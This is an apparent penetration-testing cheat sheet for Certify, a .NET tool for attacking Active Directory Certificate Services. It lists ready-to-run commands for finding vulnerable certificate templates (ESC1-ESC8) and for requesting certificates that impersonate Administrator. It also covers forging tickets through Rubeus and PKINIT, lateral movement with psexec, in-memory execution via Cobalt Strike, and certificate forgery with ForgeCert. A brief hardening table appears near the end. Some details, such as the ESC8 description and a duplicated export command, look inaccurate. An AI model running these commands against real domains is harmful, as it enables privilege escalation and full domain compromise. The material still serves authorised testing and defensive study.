Aller au contenu
1337skills 1337skills - Aide-mémoires

Certify

Certify is a .NET tool for enumerating and abusing Active Directory Certificate Services (AD CS) to identify vulnerable certificate templates and misconfigured certification authorities for privilege escalation and lateral movement.

Installation

Section intitulée « Installation »

Compile from Source

Section intitulée « Compile from Source »

Clone the GhostPack repository and compile with Visual Studio:

git clone https://github.com/GhostPack/Certify.git
cd Certify
# Open Certify.sln in Visual Studio 2019/2022
# Build > Build Solution (Release x64)
# Output: Certify.exe in bin/Release/

Precompiled Releases

Section intitulée « Precompiled Releases »

Download precompiled binaries from the GitHub releases page:

# Extract and execute directly
.\Certify.exe find /vulnerable

Execute-Assembly in Cobalt Strike

Section intitulée « Execute-Assembly in Cobalt Strike »

Load Certify as a .NET assembly in Cobalt Strike for in-memory execution:

beacon> execute-assembly /path/to/Certify.exe find /vulnerable

Quick Start

Section intitulée « Quick Start »

Find Vulnerable Templates

Section intitulée « Find Vulnerable Templates »
# Enumerate all templates and identify those with known vulnerabilities (ESC1-ESC8)
Certify.exe find /vulnerable

Enumerate All CAs

Section intitulée « Enumerate All CAs »
# List all certification authorities in the domain
Certify.exe cas

Enumerate All Templates

Section intitulée « Enumerate All Templates »
# Display all certificate templates available for enrollment
Certify.exe find

Enumeration

Section intitulée « Enumeration »

Enumerate Certification Authorities

Section intitulée « Enumerate Certification Authorities »
# List all CAs with detailed information
Certify.exe cas

# Output includes:
# - CA Name
# - DN (Distinguished Name)
# - Certificate Subject
# - Web Enrollment support

Enumerate Certificate Templates

Section intitulée « Enumerate Certificate Templates »
# List all available templates with enrollment requirements
Certify.exe find

# Displays:
# - Template Name
# - EKU (Extended Key Usage)
# - Enrollment Rights
# - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag
# - Manager Approval requirement
# - Authorized Signatures

Find Vulnerable Templates

Section intitulée « Find Vulnerable Templates »
# Identify templates vulnerable to ESC1-ESC8 attacks
Certify.exe find /vulnerable

# Highlights potentially exploitable misconfigurations

Filter by Template Purpose

Section intitulée « Filter by Template Purpose »
# Find templates allowing client authentication (ESC1/ESC3)
Certify.exe find /clientauth

# Find templates where enrollee supplies subject (ESC1)
Certify.exe find /enrolleeSuppliesSubject

Enumerate PKI Objects and Permissions

Section intitulée « Enumerate PKI Objects and Permissions »
# Display detailed PKI object information including permissions
Certify.exe pkiobjects

# Shows CA access control lists and enrollment agent permissions

Certificate Request

Section intitulée « Certificate Request »

Basic Certificate Request

Section intitulée « Basic Certificate Request »
# Request certificate from specific CA using target template
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User

Subject Alternative Name (SAN) Abuse

Section intitulée « Subject Alternative Name (SAN) Abuse »
# Add alternate principal name (ESC1 exploitation)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /altname:Administrator

# Common targets for SAN abuse:
# /altname:Administrator         # Domain admin user
# /altname:DOMAIN\Administrator  # Fully qualified name
# /altname:krbtgt                # KDC account

On-Behalf-Of Enrollment

Section intitulée « On-Behalf-Of Enrollment »
# Request certificate on behalf of another user (enrollment agent abuse)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /onbehalfof:DOMAIN\Administrator

Install Certificate After Request

Section intitulée « Install Certificate After Request »
# Install generated certificate in current user's personal store
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install

# Certificate stored in:
# Cert:\CurrentUser\My\[Thumbprint]

Export Certificate to File

Section intitulée « Export Certificate to File »
# Request and output certificate/key to PFX (contains private key)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install

# Retrieve from certificate store and export with openssl
# (See Integration section)

Vulnerable Template Identification

Section intitulée « Vulnerable Template Identification »

ESC1: Unrestricted Enrollment + SAN Abuse

Section intitulée « ESC1: Unrestricted Enrollment + SAN Abuse »

Conditions:

  • Template allows any principal to enroll
  • Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set)
  • EKU includes client authentication
  • Manager approval not required

Certify identifies: [!] Enrollee supplies subject

Exploitation: Request cert with /altname:Administrator and use for authentication.

ESC2: Certificate Template Abuse (General Abuse)

Section intitulée « ESC2: Certificate Template Abuse (General Abuse) »

Conditions:

  • Any EKU allows any purpose
  • Enrollee supplies subject enabled
  • No manager approval

Certify identifies: [!] ANY_PURPOSE EKU

Exploitation: Request cert for arbitrary use cases (authentication, signing, encryption).

ESC3: Enrollment Agent Abuse

Section intitulée « ESC3: Enrollment Agent Abuse »

Conditions:

  • Enrollment Agent template allows unrestricted enrollment
  • Any principal can request as another user
  • Target user’s template allows enrollment

Certify identifies: [!] Enrollment Agent template + enrollment rights mismatch

Exploitation: Use /onbehalfof to request certs for high-privilege users.

ESC4: Misconfigured Certificate Template Permissions

Section intitulée « ESC4: Misconfigured Certificate Template Permissions »

Conditions:

  • Low-privileged user has ModifyTemplate rights
  • Can modify template settings to create vulnerability
  • Change EKU, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, permissions

Certify identifies: Template permissions via pkiobjects

Exploitation: Modify template then request exploitable certificate.

ESC5: Vulnerable PKI Object Permissions

Section intitulée « ESC5: Vulnerable PKI Object Permissions »

Conditions:

  • Low-privileged user has dangerous permissions over CA/templates
  • FullControl, Write, WriteDacl on PKI objects
  • Can modify CA configuration or template settings

Certify identifies: via pkiobjects + low-priv user with ACE

Exploitation: Modify template CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or CA settings.

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag

Section intitulée « ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag »

Conditions:

  • CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
  • Allows client-supplied SubjectAltName in requests
  • Default template allows any user to request

Certify identifies: [!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled

Exploitation: Request cert with arbitrary SAN on any template.

ESC7: Vulnerable CA Access Control

Section intitulée « ESC7: Vulnerable CA Access Control »

Conditions:

  • Low-privileged user has dangerous permissions (Manage Certificates, etc.)
  • Can approve/deny pending requests
  • Can configure CA settings

Certify identifies: via pkiobjects + ACL review

Exploitation: Approve own requests, modify CA configuration.

ESC8: Web Enrollment Enabled

Section intitulée « ESC8: Web Enrollment Enabled »

Conditions:

  • CA has web enrollment service enabled
  • Accessible without authentication or with weak auth
  • No request validation

Certify identifies: [+] Web Enrollment Enabled

Exploitation: Submit request directly via HTTP without strong auth.

CA Enumeration Details

Section intitulée « CA Enumeration Details »

CA Permissions and Access Control

Section intitulée « CA Permissions and Access Control »
# Review CA access control lists
Certify.exe pkiobjects

# Look for:
# - Low-privileged users with "Manage Certificates"
# - Non-admin users with CA access
# - Enrollment agent permissions

EDITF Flags

Section intitulée « EDITF Flags »
# CA with EDITF_ATTRIBUTESUBJECTALTNAME2 allows client-supplied SANs
# This creates ESC6 vulnerability if any template allows unrestricted enrollment

Certify.exe cas
# Look for "[!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled"

Web Enrollment Endpoints

Section intitulée « Web Enrollment Endpoints »
# Check for enabled web enrollment service
Certify.exe cas

# Web enrollment typically hosted at:
# http://CA-SERVER/certsrv/
# https://CA-SERVER/certsrv/

# Request certificate via HTTP POST if authentication is weak/missing

Template Analysis

Section intitulée « Template Analysis »

Understanding Certify Output

Section intitulée « Understanding Certify Output »
[+] Template Name: User
    [+] Template Schema Version: 2
    [+] Display Name: User
    [+] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com
    [+] Enrollment Rights:
        Authenticated Users - Full (2032)
    [+] EKU: Client Authentication, Email Protection
    [+] Enrollee Supplies Subject: True
    [+] Manager Approval: False
    [+] Requires Authorized Signatures: 0
    [+] Authorized Signatures: 
    [+] CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: True

Key Fields

Section intitulée « Key Fields »
FieldMeaning
Enrollee Supplies SubjectUser can specify certificate subject/SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECTCertificate template flag enabling above
EKUExtended Key Usage (Client Auth, Server Auth, Code Signing, etc.)
Enrollment RightsWhich principals can request from this template
Manager ApprovalRequires CA manager to approve request
Authorized SignaturesNumber of authorized signatures required
ANY_PURPOSEDangerous EKU allowing any usage

Dangerous Configurations

Section intitulée « Dangerous Configurations »
[!] Enrollee supplies subject
[!] Any principal can enroll
[!] Client Authentication EKU present
[!] Manager Approval: False
[!] Authorized Signatures: 0

# All together = ESC1 vulnerability

Certificate Installation and Usage

Section intitulée « Certificate Installation and Usage »

Export Certificate to PFX

Section intitulée « Export Certificate to PFX »
# From certificate store to file
$cert = Get-ChildItem Cert:\CurrentUser\My\[Thumbprint]
$password = ConvertTo-SecureString -String "password" -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath cert.pfx -Password $password

Convert PFX to Rubeus Format

Section intitulée « Convert PFX to Rubeus Format »
# Install openssl or use WSL
openssl pkcs12 -in cert.pfx -out cert.pem -nodes -passin pass:password

# Load into Rubeus for Kerberos authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pem /createnetonly:C:\Windows\System32\cmd.exe

Pass-the-Cert Attack

Section intitulée « Pass-the-Cert Attack »
# Use certificate for authentication without plaintext password
# Via Rubeus PKINIT
Rubeus.exe asktgt /user:Administrator /certificate:C:\path\to\cert.pfx /password:certpassword /createnetonly:C:\Windows\System32\cmd.exe

# Spawns process with TGT for Administrator
# Use for lateral movement and persistence

PKINIT and Kerberos

Section intitulée « PKINIT and Kerberos »
# PKINITtools - Kerberos authentication via certificate
# Requires certificate with Client Authentication EKU

# Request TGT using certificate identity
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password domain.com\\Administrator administrator.ccache

# Use ccache for lateral movement
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET

Troubleshooting

Section intitulée « Troubleshooting »

”Access Denied” During Enumeration

Section intitulée « ”Access Denied” During Enumeration »
# Running as non-domain-joined user or unauthenticated
# Ensure domain connectivity and valid credentials

# Run as domain user:
runas /user:DOMAIN\username cmd.exe
# Then execute Certify.exe

No Vulnerable Templates Found

Section intitulée « No Vulnerable Templates Found »
# May indicate:
# 1. Templates properly secured (no ESC conditions)
# 2. Organization hardened against ADCS attacks
# 3. Limited template visibility for current user

# Review all templates regardless:
Certify.exe find
# Manually analyze based on ESC conditions above

Certificate Request Denied

Section intitulée « Certificate Request Denied »
# Reasons:
# - Insufficient enrollment rights
# - Template requires manager approval (pending request)
# - CA configured to deny certain principals

# Check enrollment rights:
Certify.exe find /template:TemplateName
# Review "Enrollment Rights" output

Web Enrollment 404 or Unavailable

Section intitulée « Web Enrollment 404 or Unavailable »
# CA web enrollment service not running or disabled
# Fallback to direct CA RPC interface

# Certify uses RPC by default, web enrollment is optional
# Check CA configuration for enabled services

Best Practices

Section intitulée « Best Practices »
PracticeDescription
Review All TemplatesRun Certify.exe find and manually review against ESC conditions
Monitor EnrollmentsTrack certificate requests on CAs for suspicious activity
Restrict SAN AbuseDisable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on sensitive templates
Enforce ApprovalsRequire manager approval for privileged templates
Limit Enrollment RightsRestrict principals able to enroll (not Authenticated Users)
Disable EDITF FlagsReview and remove unnecessary EDITF_* flags on CAs
RBAC on PKI ObjectsLimit template modification and CA access to admins
Certificate AuditingMonitor issued certificates for anomalies
EKU RestrictionsUse specific EKUs (not ANY_PURPOSE)
Section intitulée « Related Tools »

Certipy (Python)

Section intitulée « Certipy (Python) »
# Python ADCS enumeration and exploitation
certipy find -u user@domain.com -p password -dc-ip 10.0.0.1
certipy req -u user@domain.com -p password -ca CA-NAME -template User

ForgeCert

Section intitulée « ForgeCert »
# Forge certificates without CA interaction
# Requires NTLM hash of CA account
ForgeCert.exe --CaCert ca-cert.cer --CaKey ca-key.key --Subject CN=Administrator

Rubeus

Section intitulée « Rubeus »
# Kerberos manipulation and PKINIT authentication
# Integrated with certificate-based authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx

PKINITtools

Section intitulée « PKINITtools »
# Kerberos PKINIT support and certificate-based auth
# Cross-platform (Python/Linux)
getTGT.py -cert-pfx cert.pfx DOMAIN/Administrator

Certutil (Native Windows)

Section intitulée « Certutil (Native Windows) »
# Native Windows utility for certificate operations
certutil -config CA-NAME -ca.cert ca-cert.cer

# Request certificate directly
certutil -ca.cert -crl